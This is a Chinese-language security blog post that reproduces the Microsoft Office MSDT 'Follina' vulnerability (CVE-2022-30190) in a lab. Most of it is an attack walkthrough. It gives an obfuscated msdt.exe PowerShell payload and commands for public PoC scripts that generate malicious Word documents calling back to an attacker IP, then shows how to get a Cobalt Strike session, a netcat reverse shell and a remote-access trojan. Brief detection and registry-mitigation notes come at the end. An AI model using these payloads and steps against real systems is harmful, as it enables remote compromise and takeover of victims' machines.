Microsoft Office MSDT 代码执行漏洞

admin 2023年1月30日21:30:19评论33 views字数 2194阅读7分18秒阅读模式

·点击蓝字 关注我们·

Microsoft Office MSDT 代码执行漏洞


(CVE-2022-30190)复现

漏洞概述

该漏洞首次发现在2022 年 5 月 27 日,由白俄罗斯的一个 IP 地址上传。恶意文档从 Word 远程模板功能从远程 Web 服务器检索 HTML 文件,通过 ms-msdt MSProtocol URI方法来执行恶意PowerShell代码。感染过程利用 Windows 程序 msdt.exe,该程序用于运行各种 Windows 疑难解答程序包。此工具的恶意文档无需用户交互即可调用它。导致在宏被禁用的情况下,恶意文档依旧可以使用 ms-msdt URI执行任意PowerShell代码。


影响版本

目前已知影响的版本为:

office 2021 Lts

office 2019

office 2016

Office 2013

Office ProPlus

Office 365


漏洞复现

Payload

msdt.exe /id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'YwBhAGwAYwA='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe"

在cmd中运行即可弹出计算器:

Microsoft Office MSDT 代码执行漏洞

环境部署

office下载地址:


https://otp.landian.vip/zh-cn/download.html


因为已经部署好了,简单截图说明一下:

Microsoft Office MSDT 代码执行漏洞

windows环境用了:

Microsoft Office MSDT 代码执行漏洞

环境说明:

攻击机ip:192.168.84.205

目标靶机ip:192.168.84.185

使用poc1:

下载地址:


https://github.com/chvancooten/follina.py


在攻击机执行:

python3 .follina.py -t docx -m binary -b windowssystem32calc.exe -u 192.168.84.205

生成恶意docx文档:

Microsoft Office MSDT 代码执行漏洞

将clickme.docx放在靶机打开:

Microsoft Office MSDT 代码执行漏洞

这里远程加载恶意文件,生活中遇到这种情况可以警惕了。
程序错误诊断,然后弹出计算器:

Microsoft Office MSDT 代码执行漏洞

攻击机可以看到远程加载请求:

Microsoft Office MSDT 代码执行漏洞

复现成功。
我们肯定不满足于弹出计算器,如何深度利用获取权限呢?

使用poc2

poc1的命令执行没看懂。
下载地址:


https://github.com/JohnHammond/msdt-follina

CS上线

在cs上生成木马,这个不用多说。
创建pocexe文件夹,将nc,cs木马放进去,并在该目录下开启简单的http.server

服务:

Microsoft Office MSDT 代码执行漏洞

开启服务:
python -m http.server 8080

Microsoft Office MSDT 代码执行漏洞

改poc(follina.py)文件下载路径:

Microsoft Office MSDT 代码执行漏洞

生成恶意文档:
python follina.py -i 192.168.84.205 -p 8000 -r 5555 #-r为反弹shell的端口,这里暂时用不到

Microsoft Office MSDT 代码执行漏洞

将生成的follina.doc放在靶机打开:

Microsoft Office MSDT 代码执行漏洞

上线

Microsoft Office MSDT 代码执行漏洞
Microsoft Office MSDT 代码执行漏洞

nc反弹shell

改poc配置:

Microsoft Office MSDT 代码执行漏洞

执行命令:
python follina.py -i 192.168.84.205 -p 8000 -r 5555 #这里用到了 -r 反弹shell

Microsoft Office MSDT 代码执行漏洞

将生成得doc文档放在靶机执行:

Microsoft Office MSDT 代码执行漏洞

反弹shell成功:

Microsoft Office MSDT 代码执行漏洞

看到nc运行:

Microsoft Office MSDT 代码执行漏洞

大灰狼远控

用了7.5的版本,9.5的版本在虚拟机运行报错,大半天都没解决。生成木马:

Microsoft Office MSDT 代码执行漏洞

系统设置,配置监听端口:

Microsoft Office MSDT 代码执行漏洞

然后与上面的两种方式一样,加载大灰狼木马

Microsoft Office MSDT 代码执行漏洞

目标机运行:

Microsoft Office MSDT 代码执行漏洞

上线:

Microsoft Office MSDT 代码执行漏洞

免杀做好,还是比较强大的:

Microsoft Office MSDT 代码执行漏洞

简单分析

将doc文件后缀改为zip:

Microsoft Office MSDT 代码执行漏洞

解压:

Microsoft Office MSDT 代码执行漏洞
Microsoft Office MSDT 代码执行漏洞

可以根据这个ip溯源反制。

检测的思路:

从cmd/msedge/office这些进程诞生的msdt.exe进程是可疑的。
msdt.exe里参数带有/../../xxxx/.exe,恶意payload。直接检测这个也是可以的。


修复建议

以管理员身份运行命令提示符,执行以下两条命令:

reg export HKEY_CLASSES_ROOTms-msdt filename
reg delete HKEY_CLASSES_ROOTms-msdt /f

撤消解决方法:

reg import filename


总结

对大佬们的文章进行了资源整合。这里仅作线下学习,如有违法行为,与本人无关。


Microsoft Office MSDT 代码执行漏洞


Microsoft Office MSDT 代码执行漏洞

参考文章:

https://blog.csdn.net/weixin_45329947/article/details/125089243

https://www.cnblogs.com/bonelee/p/16337291.html

结尾:本文出自掌控社区-zhang3


最后

Microsoft Office MSDT 代码执行漏洞
Microsoft Office MSDT 代码执行漏洞

团队招新啦~

招新规则:想加入团队,可以留言联系我,需要自行录制或者直播一次技术分享,技术内容不限~

我们团队秉承着互相学习互相分享,共同进步的精神进行学习哒~


原文始发于微信公众号(鸿鹄空间安全实验室):Microsoft Office MSDT 代码执行漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年1月30日21:30:19
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Microsoft Office MSDT 代码执行漏洞http://cn-sec.com/archives/1348002.html

发表评论

匿名网友 填写信息